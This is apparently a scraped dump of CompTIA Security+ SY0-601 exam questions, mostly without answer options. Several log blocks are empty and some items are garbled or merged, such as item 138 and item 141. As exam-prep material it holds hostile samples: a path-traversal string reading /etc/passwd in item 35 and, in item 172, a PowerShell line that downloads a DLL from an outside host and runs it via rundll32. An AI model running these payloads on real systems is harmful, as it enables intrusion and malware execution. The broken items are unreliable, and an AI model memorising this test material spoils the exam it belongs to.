SY0-601 Dumps Questions Increase Your Chance of Success

1. A newly identified network access vulnerability has been found in the OS of legacy loT devices.

Which of the following would best mitigate this vulnerability quickly?

2. Which of the following is most likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have been implemented?

3. Which of the following is the most likely way a rogue device was allowed to connect?

4. A systems engineer thinks a business system has been compromised and is being used to exfiltrated data to a competitor The engineer contacts the CSIRT The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else.

Which of the following is the most likely reason for this request?

5. Which of the following would be BEST for a technician to review to determine the total risk an organization can bear when assessing a "cloud-first" adoption strategy?

6. Which of the following describes a maintenance metric that measures the average time required to troubleshoot and restore failed equipment?

7. Which of the following will increase cryptographic security?

8. A security engineer is concerned the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer wants a tool that can monitor for changes to key files and network traffic for the device.

Which of the following tools should the engineer select?

9. An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network.

Which of the following should the administrator use to accomplish this goal?

10. Which of the following techniques would most likely be used as a part of an insider threat reduction strategy to uncover relevant indicators?

11. A security analyst locates a potentially malicious video file on a server and needs to identify both the creation date and the file's creator.

Which of the following actions would most likely give the security analyst the information required?

12. All security analysts' workstations at a company have network access to a critical server VLAN. The information security manager wants to further enhance the controls by requiring that all access to the secure VLAN be authorized only from a given single location.

Which of the following will the information security manager most likely implement?

13. A company is required to use certified hardware when building networks.

Which of the following best addresses the risks associated with procuring counterfeit hardware?

14. A security administrator checks the security logs of a Linux server and sees a lot of the following lines:





Which of the following is most likely being attempted?

15. Which of the following types of data are most likely to be subject to regulations and laws? (Select two).

16. An organization is required to maintain financial data records for three years and customer data for five years.

Which of the following data management policies should the organization implement?

17. During a security incident the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9 A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network.

Which of the following fulfills this request?

18. An application server is published directly on the internet with a public IP address.

Which of the following should the administrator use to monitor the application traffic?

19. A security analyst has been reading about a newly discovered cyberattack from a known threat actor.

Which of the following would best support the analyst's review of the tactics, techniques, and protocols the throat actor was observed using in previous campaigns?

20. A security analyst wants to fingerprint a web server.

Which of the following tools will the security analyst MOST likely use to accomplish this task?

21. An auditor discovered multiple insecure pons on some server’s Other servers were found to have legacy protocols enabled.

Which of the following tools did the auditor use to discover these issues?

22. A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint.

Which of the following solutions would best help to protect against the attack?

23. An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness.

Which of the following will the CSO most likely use?

24. A Chief Information Officer is concerned about employees using company-issued laptops to steal data when accessing network shares.

Which of the following should the company implement?

25. A security analyst is reviewing the following system command history on a computer that was recently utilized in a larger attack on the corporate infrastructure





Which of the following best describes what the analyst has discovered?

26. Which of the following security concepts is the best reason for permissions on a human resources fileshare to follow the principle of least privilege?

27. Which of the following is the most likely to be used to document risks, responsible parties, and thresholds?

28. The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the vulnerability and discovered the domain controller does not run the associated application with the vulnerability.

Which of the following steps should the administrator take next?

A. Ensure the scan engine is configured correctly.

B. Apply a patch to the domain controller.

C. Research the CVE.

D. Document this as a false positive.

29. A user is trying unsuccessfully to send images via SMS. The user downloaded the images from a corporate email account on a work phone.

Which of the following policies is preventing the user from completing this action?

30. During a recent penetration test, a tester plugged a laptop into an Ethernet port in an unoccupied conference room and obtained a valid IP address.

Which of the following would have best prevented this avenue of attack?

31. Which of the following examples would be best mitigated by input sanitization?

32. A company Is planning to install a guest wireless network so visitors will be able to access the Internet. The stakeholders want the network to be easy to connect to so time is not wasted during

meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms where visitors will attend meetings.

Which of the following would BEST protect the company's Internal wireless network against visitors accessing company resources?

33. Which of the following is most likely to include a SCADA system?

34. A company located in an area prone to hurricanes is developing a disaster recovery plan and looking at site considerations that allow the company to quickly continue operations.

Which of the following is the best type of site for this company?

35. A security analyst reviews web server logs and finds the following string gallerys?file―. ./../../../../. . / . ./etc/passwd

Which of the following attacks was performed against the web server?

36. A security researcher has alerted an organization that its sensitive user data was found for sale on a website.

Which of the following should the organization use to inform the affected parties?

37. 168.1.255 ff-ff-ff-ff-ff-ff static

Which of the following is the analyst observing?

38. A web application for a bank displays the following output when showing details about a customer's bank account:





Which of the following techniques is most likely implemented in this web application?

39. A security operations center would like to be able to test and observe the behavior of new software executables for malicious activity.

Which of the following should the security operations center implement?

40. A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located.

Which of the following would best correct the issue?

41. During an incident a company CIRT determine it is necessary to observe the continued network-based transaction between a callback domain and the malware running on an enterprise PC.

Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral spread and the risk that the adversary would notice any changes?

42. An organization's internet-facing website was compromised when an attacker exploited a buffer overflow.

Which of the following should the organization deploy to best protect against similar attacks in the future?

43. A systems administrator is looking for a low-cost application-hosting solution that is cloud-based.

Which of the following meets these requirements?

44. Which of the following threat actors is most likely to be motivated by ideology?

45. A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure only authorized users can access corporate resources.

Which of the following should the security team do? (Refer the answer from CompTIA SY0-601 Security+ documents or guide at comptia.org)

46. A company is auditing the manner in which its European customers’ personal information is handled.

Which of the following should the company consult?

47. A company is providing security awareness training regarding the importance of not forwarding social media messages from unverified sources.

Which of the following risks would this training help to prevent?

48. An organization is repairing the damage after an incident.

Which of the following controls is being implemented?

49. Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's Pll?

50. A security analyst needs an overview of vulnerabilities for a host on the network.

Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable services are running?

51. Which of the following describes the ability of code to target a hypervisor from inside a guest OS?

52. To improve the security at a data center, a security administrator implements a CCTV system and posts several signs about the possibility of being filmed.

Which of the following best describe these types of controls? (Select two).

53. Which of the following should a security operations center use to improve its incident response procedure?

54. Following a prolonged data center outage that affected web-based sales, a company has decided to move its operations to a private cloud solution.

The security team has received the following requirements

• There must be visibility into how teams are using cloud-based services

• The company must be able to identity when data related to payment cards is being sent to the cloud

• Data must be available regardless of the end user's geographic location

• Administrators need a single pane-of-glass view into traffic and trends

Which of the following should the security analyst recommend?

55. A hosting provider needs to prove that its security controls have been in place over the last six months and have sufficiently protected customer data.

Which of the following would provide the best proof that the hosting provider has met the requirements?

56. An employee's company email is configured with conditional access and requires that MFA is enabled and used. An example of MFA is a phone call and:

57. An attacker is using a method to hide data inside of benign files in order to exfiltrate confidential data.

Which of the following is the attacker most likely using?

58. An incident analyst finds several image files on a hard disk. The image files may contain geolocation coordinates.

Which of the following best describes the type of information the analyst is trying to extract from the image files?

59. Which of the following should customers who are involved with Ul developer agreements be concerned with when considering the use of these products on highly sensitive projects?

60. Which of the following involves embedding malware in routers procured from a third-party vendor?

61. During an assessment, a systems administrator found several hosts running FTP and decided to immediately block FTP communications at the firewall.

Which of the following describes the greatest risk associated with using FTP?

62. As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level.

Which of the following certificate properties will meet these requirements?

63. A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure.

Which of the following should the architect choose?

64. A security analyst is assessing several company firewalls.

Which of the following tools would the analyst most likely use to generate custom packets to use during the assessment?

65. A security analyst is creating baselines for the server team to follow when hardening new devices for deployment.

Which of the following best describes what the analyst is creating?

A. Change management procedure

B. Information security policy

C. Cybersecurity framework

D. Secure configuration guide

66. Preconfigure the client for an incoming guest. The guest AD credentials are:

User: guest01

Password: guestpass

67. Which of the following would be used to detect an employee emailing a customer list to a personal account before leaving the company?

68. A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down.

Which of the following should the architect implement on the server to achieve this goal?

69. A software developer would like to ensure the source code cannot be reverse engineered or debugged.

Which of the following should the developer consider?

70. A local server recently crashed, and the team is attempting to restore the server from a backup. During the restore process, the team notices the file size of each daily backup is large and will run out of space at the current rate.

The current solution appears to do a full backup every night.

Which of the following would use the least amount of storage space for backups?

71. The management team has requested that the security team implement 802.1X into the existing wireless network setup.

The following requirements must be met:

• Minimal interruption to the end user

• Mutual certificate validation

Which of the following authentication protocols would meet these requirements?

72. Sales team members have been receiving threatening voicemail messages and have reported these incidents to the IT security team.

Which of the following would be MOST appropriate for the IT security team to analyze?

73. A company is implementing a new SIEM to log and send alerts whenever malicious activity is blocked by its antivirus and web content filters.

Which of the following is the primary use case for this scenario?

74. A security administrator examines the ARP table of an access switch and sees the following output:





Which of the following is a potential threat that is occurring on this access switch?

75. Which of the following best describes when an organization Utilizes a read-to-use application from a cloud provider?

76. A company is concerned about individuals dnvmg a car into the building to gam access.

Which of the following security controls would work BEST to prevent this from happening?

77. A security analyst discovers that a company's username and password database were posted on an internet forum. The usernames and passwords are stored in plaintext.

Which of the following would mitigate the damage done by this type of data exfiltration in the future?

78. Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?

79. A company installed several crosscut shredders as part of increased information security practices targeting data leakage risks.

Which of the following will this practice reduce?

80. A penetration-testing firm is working with a local community bank to create a proposal that best fits the needs of the bank. The bank's information security manager would like the penetration test to resemble a real attack scenario, but it cannot afford the hours required by the penetration-testing firm.

Which of the following would best address the bank's desired scenario and budget?

81. A company acquired several other small companies The company that acquired the others is transitioning network services to the cloud The company wants to make sure that performance and security remain intact.

Which of the following BEST meets both requirements?

82. During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HIIPS site requests are reverting to HTTP.

Which of the following BEST describes what is happening?

83. A security analyst discovers that a large number of employee credentials had been stolen and were being sold on the dark web. The analyst investigates and discovers that some hourly employee credentials were compromised, but salaried employee credentials were not affected.

Most employees clocked in and out while they were inside the building using one of the kiosks connected to the network. However, some clocked out and recorded their time after leaving to go home. Only those who clocked in and out while inside the building had credentials stolen. Each of the kiosks are on different floors, and there are multiple routers, since the business segments environments for certain business functions.

Hourly employees are required to use a website called acmetimekeeping.com to clock in and out. This website is accessible from the internet.

Which of the following is the most likely reason for this compromise?

84. A privileged user at a company stole several proprietary documents from a server. The user also went into the log files and deleted all records of the incident The systems administrator has just informed investigators that other log files are available for review.

Which of the following did the administrator most likely configure that will assist the investigators?

85. A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices.

Which of the following vulnerabilities is the organization addressing?

86. A company has numerous employees who store PHI data locally on devices. The Chief Information Officer wants to implement a solution to reduce external exposure of PHI but not affect the business.

The first step the IT team should perform is to deploy a DLP solution:

87. A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile applications. The company would like to use MDM, but employees are concerned about the loss of personal data.

Which of the following should the IT department implement to BEST protect the company against company data loss while still addressing the employees’ concerns?

A. Enable the remote-wiping option in the MDM software in case the phone is stolen.

B. Configure the MDM software to enforce the use of PINs to access the phone.

C. Configure MDM for FDE without enabling the lock screen.

D. Perform a factory reset on the phone before installing the company's applications.

88. An analyst in the human resources organization is responsible for the quality of the company's personnel data. The analyst maintains a data dictionary and ensures it is correct and up to date.

Which of the following best describes the role of the analyst?

89. Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?

90. Which of the following would be the best way to block unknown programs from executing?

91. Which of the following controls would provide the BEST protection against tailgating?

92. A company would like to move to the cloud. The company wants to prioritize control and security over cost and ease of management.

Which of the following cloud models would best suit this company's priorities?

93. An employee in the accounting department receives an email containing a demand for payment for services performed by a vendor. However, the vendor is not in the vendor management database.

Which of the following is this scenario an example of?

94. Which Of the following best ensures minimal downtime for organizations vÄh crit-ical computing equipment located in earthquake-prone areas?

95. A penetration tester begins an engagement by performing port and service scans against the client environment according to the rules of engagement.

Which of the following reconnaissance types is the tester performing?

96. A security analyst received the following requirements for the deployment of a security camera solution:

* The cameras must be viewable by the on-site security guards.

+ The cameras must be able to communicate with the video storage server.

* The cameras must have the time synchronized automatically.

* The cameras must not be reachable directly via the internet.

* The servers for the cameras and video storage must be available for remote maintenance via the company VPN.

Which of the following should the security analyst recommend to securely meet the remote connectivity requirements?

A. Creating firewall rules that prevent outgoing traffic from the subnet the servers and cameras reside on

B. Deploying a jump server that is accessible via the internal network that can communicate with the servers

C. Disabling all unused ports on the switch that the cameras are plugged into and enabling MAC filtering

D. Implementing a WAF to allow traffic from the local NTP server to the camera server

97. A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption.

Which of the following best describes this step?

98. A security architect is designing the new outbound internet for a small company. The company would like all 50 users to share the same single Internet connection. In addition, users will not be permitted to use social media sites or external email services while at work.

Which of the following should be included in this design to satisfy these requirements? (Select TWO).

99. Stakeholders at an organisation must be kept aware of any incidents and receive updates on status changes as they occur.

Which of the following Plans would fulfill this requirement?

100. The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building.

Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments?

101. A retail company that is launching @ new website to showcase the company’s product line and other information for online shoppers registered the following URLs:

* www companysite com

* shop companysite com

* about-us companysite com contact-us. companysite com secure-logon company site com

Which of the following should the company use to secure its website if the company is concerned with convenience and cost?

102. A desktop support technician recently installed a new document-scanning software program on a computer. However, when the end user tried to launch the program, it did not respond.

Which of the following is MOST likely the cause?

103. Which of the following is best used to detect fraud by assigning employees to different roles?

104. An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims.

Which of the following is the attacker most likely attempting?

105. A security engineer needs to build @ solution to satisfy regulatory requirements that stale certain critical servers must be accessed using MFA However, the critical servers are older and

are unable to support the addition of MFA.

Which of the following will the engineer MOST likely use to achieve this objective?

106. Local guidelines require that all information systems meet a minimum security baseline to be compliant.

Which of the following can security administrators use to assess their system configurations against the baseline?

107. Which of the following would most likely include language prohibiting end users from accessing personal email from a company device?

108. An analyst Is generating a security report for the management team. Security guidelines recommend disabling all listening unencrypted services.

Given this output from Nmap:





Which of the following should the analyst recommend to disable?

109. Which of the following utilizes public and private keys to secure data?

110. A bad actor tries to persuade someone to provide financial information over the phone in order to gain access to funds.

Which of the following types of attacks does this scenario describe?

111. A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP.

Which of the following mitigations would be best for the security manager to implement while maintaining alerting capabilities?

112. Which of the following vulnerabilities is associated with installing software outside of a manufacturer's approved software repository?

113. An organization wants to enable built-in FDE on all laptops.

Which of the following should the organization ensure is Installed on all laptops?

114. While assessing the security of a web application, a security analyst was able to introduce unsecure strings through the application input fields by bypassing client-side controls.

Which of the following solutions should the analyst recommend?

115. Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?

116. 1.A company has discovered unauthorized devices are using its WIFI network, and it wants to harden the access point to improve security.

Which of the following configuration should an analysis enable to improve security? (Select TWO.)

117. The alert indicates an attacker entered thousands of characters into the text box of a web form. The web form was intended for legitimate customers to enter their phone numbers.

Which of the attacks has most likely occurred?

118. A grocery store is expressing security and reliability concerns regarding the on-site backup strategy currently being performed by locally attached disks. The main concerns are the physical security of the backup media and the durability of the data stored on these devices.

Which of the following is a cost-effective approach to address these concerns?

119. Which of the following are cases in which an engineer should recommend the decommissioning of a network device? (Select two).

120. An IT manager informs the entire help desk staff that only the IT manager and the help desk lead will have access to the administrator console of the help desk software.

Which of the following security techniques is the IT manager setting up?

121. A dynamic application vulnerability scan identified code injection could be performed using a web form.

Which of the following will be BEST remediation to prevent this vulnerability?

122. The concept of connecting a user account across the systems of multiple enterprises is best known as:

123. A security analyst is looking for a solution to help communicate to the leadership team the seventy levels of the organization's vulnerabilities.

Which of the following would best meet this need?

124. A company's end users are reporting that they are unable to reach external websites. After reviewing the performance data for the DNS severs, the analyst discovers that the CPU, disk, and memory usage are minimal, but the network interface is flooded with inbound traffic. Network logs show only a small number of DNS queries sent to this server.

Which of the following best describes what the security analyst is seeing?

125. Which of the following social engineering attacks best describes an email that is primarily intended to mislead recipients into forwarding the email to others?

126. Which of the following best describes the tolerances a security architect follows when designing a control environment?

127. Which of the following controls would be the MOST cost-effective and time-efficient to deter intrusions at the perimeter of a restricted, remote military training area? (Select TWO).

128. A company recently decided to allow employees to work remotely. The company wants to protect its data without using a VPN.

Which of the following technologies should the company implement?

129. A company would like to protect credit card information that is stored in a database from being exposed and reused. However, the current POS system does not support encryption.

Which of the following would be BEST suited to secure this information?

(Give me related explanation and references from CompTIA Security+ SY0-601 documents for Correct answer option)

130. A security team created a document that details the order in which critical systems should be brought back online after a major outage.

Which of the following documents did the team create?

131. A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming from an employee's corporate laptop. The security analyst has determined that additional data about the executable running on the machine is necessary to continue the investigation.

Which of the following logs should the analyst use as a data source?

132. Which of the following terms should be included in a contract to help a company monitor the ongoing security maturity Of a new vendor?

133. Which of the following secure coding practices involves keeping business logic within a database?

134. A security analyst at an organization observed several user logins from outside the organization's network The analyst determined that these logins were not performed by individuals within the organization.

Which of the following recommendations would reduce the likelihood of future attacks? (Select two).

135. An organization wants to integrate its incident response processes into a workflow with automated decision points and actions based on predefined playbooks.

Which of the following should the organization implement?

136. A company is concerned about weather events causing damage to the server room and downtime.

Which of the following should the company consider?

137. A Chief Information Officer receives an email stating a database will be encrypted within 24 hours unless a payment of $20,000 is credited to the account mentioned In the email.

This BEST describes a scenario related to:

138. Which of the following should a security operations center use to improve.

Which of the following access controls is most likely inhibiting the transfer?

139. Various stakeholders are meeting to discuss their hypothetical roles and responsibilities in a specific situation, such as a security incident or major disaster.

Which of the following best describes this meeting?

140. Which of the following would most likely mitigate the impact of an extended power outage on a company’s environment?

141. Which of the following security design features can an development team to analyze the deletion eoting Of data sets the copy?

142. A security analyst is responding to a malware incident at a company. The malware connects to a

command-and-control server on the internet in order to function.

Which of the following should the security analyst implement first?

143. An engineer is setting up a VDI environment for a factory location, and the business wants to deploy a low-cost solution to enable users on the shop floor to log in to the VDI environment directly.

Which of the following should the engineer select to meet these requirements?

144. A technician needs to apply a high-priority patch to a production system.

Which of the following steps should be taken first?

145. A security team has been alerted to a flood of incoming emails that have various subject lines and are addressed to multiple email inboxes. Each email contains a URL shortener link that is redirecting to a dead domain.

Which of the following is the best step for the security team to take?

146. An organization needs to implement more stringent controls over administrator/root credentials and service accounts.

Requirements for the project include:

* Check-in/checkout of credentials

* The ability to use but not know the password

* Automated password changes

* Logging of access to credentials

Which of the following solutions would meet the requirements?

147. A user reports performance issues when accessing certain network fileshares. The network team determines endpoint traffic is reaching one of the filestores but is being dropped on the return traffic.

Which of the following should be corrected to solve this issue?

148. A prospective customer is interested in seeing the type of data that can be retrieved when a customer uses a company's services.

An engineer at the company sends the following documentation before reviewing it:





The prospective customer is concerned.

Which of the following will best resolve the concern?

149. Which of the following is the most important security concern when using legacy systems to provide production service?

150. An enterprise has hired an outside security firm to facilitate penetration testing on its network and applications. The firm has agreed to pay for each vulnerability that ts discovered.

Which of the following BEST represents the type of testing that is being used?

151. A security analyst is investigating what appears to be unauthorized access to a corporate web application.

The security analyst reviews the web server logs and finds the following entries:





Which of the following password attacks is taking place?

152. Which of the following allow access to remote computing resources, a operating system. and centrdized configuration and data

153. Which of the following is considered a preventive control?

154. The application development team is in the final stages of developing a new healthcare application.

The team has requested copies of current PHI records to perform the final testing.

Which of the following would be the best way to safeguard this information without impeding the testing process?

155. An endpoint protection application contains critical elements that are used to protect a system from infection.

Which of the following must be updated before completing a weekly endpoint check?

156. A company is required to continue using legacy software to support a critical service.

Which of the following BEST explains a risk of this practice?

157. An organization routes all of its traffic through a VPN Most users are remote and connect into a corporate data center that houses confidential information There is a firewall at the internet border, followed by a DLP appliance, the VPN server and the data center itself.

Which of the following is the weakest design element?

158. The spread of misinformation surrounding the outbreak of a novel virus on election day led to eligible voters choosing not to take the risk of going the polls.

This is an example of:

159. While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable.

Which of the following actions would prevent this issue?

160. The SOC detected an increase in failed authentication attempts over the weekend. An engineer reviewed the following log output:





Which of the following is the most likely attack based on the log information?

161. A bank insists all of its vendors must prevent data loss on stolen laptops.

Which of the following strategies is the bank requiring?

162. An employee recently resigned from a company. The employee was responsible for managing and supporting weekly batch jobs over the past five years. A few weeks after the employee resigned, one of the batch jobs failed and caused a major disruption.

Which of the following would work best to prevent this type of incident from reoccurring?

163. A user's login credentials were recently compromised During the investigation, the security analyst determined the user input credentials into a pop-up window when prompted to confirm the username and password However the trusted website does not use a pop-up for entering user colonials.

Which of the following attacks occurred?

164. An engineer is using scripting to deploy a network in a cloud environment.

Which the following describes this scenario?

165. A third-party vendor is moving a particular application to the end-of-life stage at the end of the current year.

Which of the following is the most critical risk if the company chooses to continue running the application?

166. The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols.

Which of the following will this enable?

167. After an audit, an administrator discovers all users have access to confidential data on a file server.

Which of the following should the administrator use to restrict access to the data quickly?

168. A manager for the development team is concerned about reports showing a common set of vulnerabilities. The set of vulnerabilities is present on almost all of the applications developed by the team.

Which of the following approaches would be most effective for the manager to use to address this issue?

169. A network team segmented a critical, end-of-life server to a VLAN that can only be reached by specific devices but cannot be reached by the perimeter network.

Which of the following test describe the controls the team implemented? (Select two).

170. Which of the following best ensures minimal downtime and data loss for organizations with critical computing equipment located in earthquake-prone areas?

171. A security manager is implementing MFA and patch management.

Which of the following would best describe the control type and category? (Select two).

172. An employee received an email with an unusual file attachment named Updates. Lnk. A security analysts reverse engineering what the fle does and finds that executes the following script:

C:Windows System32WindowsPowerShellvl.0powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMPautoupdate.dll;Start-Process rundll32.exe $env:TEMPautoupdate.dll

Which of the following BEST describes what the analyst found?

173. A security engineer needs to recommend a solution to defend against malicious actors misusing protocols and being allowed through network defenses.

Which of the following will the engineer most likely recommended?

174. Which of the following security controls is used to isolate a section of the network and its externally available resources from the internal corporate network in order to reduce the number of possible attacks?

175. While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network witches.

Which of the following is the security analyst MOST likely observing?

176. A company is planning to set up a SIEM system and assign an analyst to review the logs on a weekly basis.

Which of the following types of controls is the company setting up?

177. A security analyst is reviewing logs on a server and observes the following output: 01/01/2020 03:33:23 admin attempted login with password sneak 01/01/2020 03:33:32 admin attempted login with password sneaked 01/01/2020 03:33:41 admin attempted login with password sneaker 01/01/2020 03:33:50 admin attempted login with password sneer 01/01/2020 03:33:59 admin attempted login with password sneeze 01/01/2020 03:34:08 admin attempted login with password sneezy.

Which of the following is the security analyst observing?

178. Server administrators want to configure a cloud solution so that computing memory and processor usage are maximized most efficiently across a number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability.

Which of the following should administrators configure to maximize system availability while efficiently utilizing available computing power?

179. A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system.

Which of the following deployment models is the company implementing?

180. Which of the following is used to add extra complexity before using a one-way data transformation algorithm?

181. An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box.

Which of the following should be the first lines of defense against such an attack? (Select TWO)

182. A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users' PCs.

Which of the following is the MOST likely cause of this issue?

183. A security analyst is hardening a network infrastructure

The analyst is given the following requirements

• Preserve the use of public IP addresses assigned to equipment on the core router

• Enable "in transport" encryption protection to the web server with the strongest ciphers.

Which of the following should the analyst implement to meet these requirements? (Select two).

184. An organization wants a third-party vendor to do a penetration test that targets a specific device. The organization has provided basic information about the device.

Which of the following best describes this kind of penetration test?

185. A system^ administrator performs a quick scan of an organization's domain controller and finds the following:





Which of the following vulnerabilities does this output represent?

186. An organization wants to ensure it can track changes between software deployments.

Which of the following concepts should the organization implement?

187. A company has installed badge readers for building access but is finding unauthorized individuals roaming the hallways Of the following is the most likely cause?

188. Which of the following would be best suited for constantly changing environments?

189. An email security vendor recently added a retroactive alert after discovering a phishing email had already been delivered to an inbox.

Which of the following would be the best way for the security administrator to address this type of alert in the future?

190. A dynamic application vulnerability scan identified that code injection could be performed using a web form.

Which of the following will be the best remediation to prevent this vulnerability?

191. Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code in a software company’s final software releases? (Select TWO.)

192. An employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm employee's identity before sending him the prize.

Which of the following BEST describes this type of email?

193. Which of the following is a primary security concern for a company setting up a BYOD program?

194. A security engineer is installing a WAF to protect the company's website from malicious web requests over SSL.

Which of the following is needed to meet the objective?

195. A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices.

Which of the following solutions would best support the policy?

196. An information security manager for an organization is completing a PCI DSS self-assessment for the first time.

Which of the is following MOST likely reason for this type of assessment?

197. A security administrator needs to block a TCP connection using the corporate firewall, Because this connection is potentially a threat. the administrator not want to back an RST.

Which of the following actions in rule would work best?

198. A security administrator is using UDP port 514 to send a syslog through an unsecure network to the SIEM server.

Which of the following is the best way for the administrator to improve the process?

199. Which of the following environments utilizes a subset of customer data and is most likely to be used to assess the impacts of major system upgrades and demonstrate system features?

200. After reviewing the following vulnerability scanning report:

server:192.168.14.6

Service: Telnet Port: 23 Protocol: TCP Status: Open Severity: High

Vulnerability: Use of an insecure network protocol

A security analyst performs the following test

nmap -p 23 192.18.14. --script telnet-encryption

PORT STATE SERVICE REASON

23/tcp open telnet syn-ack

I telnet encryption:

| Telnet server supports encryption

Which of the following would the security analyst conclude for this reported vulnerability7?

201. A report delivered to the Chief Information Security Officer (CISO) shows that some user credentials could be exfiltrated. The report also indicates that users tend to choose the same credentials on different systems and applications.

Which of the following policies should the CISO use to prevent someone from using the exfiltrated credentials?

202. A company's public-facing website, https://www.organization.com, has an IP address of 166.18.75.6. However, over the past hour the SOC has received reports of the site's homepage displaying incorrect information. A quick nslookup search shows hitps://;www.organization.com is pointing to 151.191.122.115.

Which of the following is occurring?

203. When decommissioning physical hardware that contains Pll. a financial institution requires that a third-party recycling company wipe and destroy the hard drives, and document the process.

Which of the following best describes this procedure?

204. A company is expanding its threat surface program and allowing individuals to security test the company's internet-facing application. The company will compensate researchers based on the vulnerabilities discovered.

Which of the following best describes the program the company is setting up?

205. A systems administrator receives the following alert from a file integrity monitoring tool:

The hash of the cmd.exe file has changed.

The systems administrator checks the OS logs and notices that no patches were applied in the last two months.

Which of the following most likely occurred?

206. A company is focused on reducing risks from removable media threats. Due to certain primary applications, removable media cannot be entirely prohibited at this time.

Which of the following best describes the company's approach?

207. Which of the following has the ability to physically verify individuals who enter and exit a restricted area?

208. An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to implement mitigation techniques to prevent further spread.

Which of the following is the BEST course of action for the analyst to take?

209. An organization wants to ensure that proprietary information is not inadvertently exposed during facility tours.

Which of the following would the organization implement to mitigate this risk?

A. Clean desk policy

B. Background checks

C. Non-disclosure agreements

D. Social media analysis

210. A company was notified that a breach occurred within its network. During the investigation the security team identified a sophisticated exploit that could not be identified or resolved using existing patching, vendor resources or remediation methods.

Which erf the following best describes this type of exploit?

211. Which of the following authentication methods is considered to be the LEAST secure?

212. A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly.

Which of the following technologies should the IT manager use when implementing MFA?

213. A security administrator recently used an internal CA to issue a certificate to a public application. A user tries to reach the application but receives a message stating, “Your connection is not private.".

Which of the following is the best way to fix this issue?

214. An organization wants to limit potential impact to its log-in database in the event of a breach.

Which of the following options is the security team most likely to recommend?

215. After multiple on-premises security solutions were migrated to the cloud, the incident response time increased. The analysts are spending a long time trying to trace information on different cloud consoles and correlating data in different formats.

Which of the following can be used to optimize the incident response time?

216. A company's web filter is configured to scan the URL for strings and deny access when matches are found.

Which of the following search strings should an analyst employ to prohibit access to non-encrypted websites?

217. An organization recently updated its security policy to include the following statement: Regular expressions are included in source code to remove special characters such as and from variables set by forms in a web application.

Which of the following best explains the security technique the organization adopted by making this addition to the policy?

218. The Chief information Security Officer has directed the security and networking team to retire the use of shared passwords on routers and switches.

Which of the following choices BEST meets the requirements?

219. An organization decided not to put controls in place because of the high cost of implementing the controls compared to the cost of a potential fine.

Which of the following risk management strategies is the organization following?

220. A junior security analyst is reviewing web server logs and identifies the following pattern in the log file:





Which of the following types of attacks is being attempted and how can it be mitigated?

221. A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours.

Which of the following is most likely occurring?

222. The Chief Information Security Officer (CISO) wants a product manager to include the following tasks as part of the deployment plans:

• Delete test accounts

• Delete test data

• Share administrative passwords securely during the transition to production.

Which of the following concepts will best enable the product manager to incorporate these tasks?

223. Which of the following is classified as high availability in a cloud environment?

224. Which of the following can best protect against an employee inadvertently installing malware on a company system?

225. Which of the following holds staff accountable while escorting unauthorized personnel?

226. Which of the following would be the best ways to ensure only authorized personnel can access a secure facility? (Select two).

227. Callers speaking a foreign language are using company phone numbers to make unsolicited phone calls to a partner organization. A security analyst validates through phone system logs that the calls are occurring and the numbers are not being spoofed.

Which of the following is the most likely explanation?

228. A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline.

The manager would like to implement a high availability pair to:

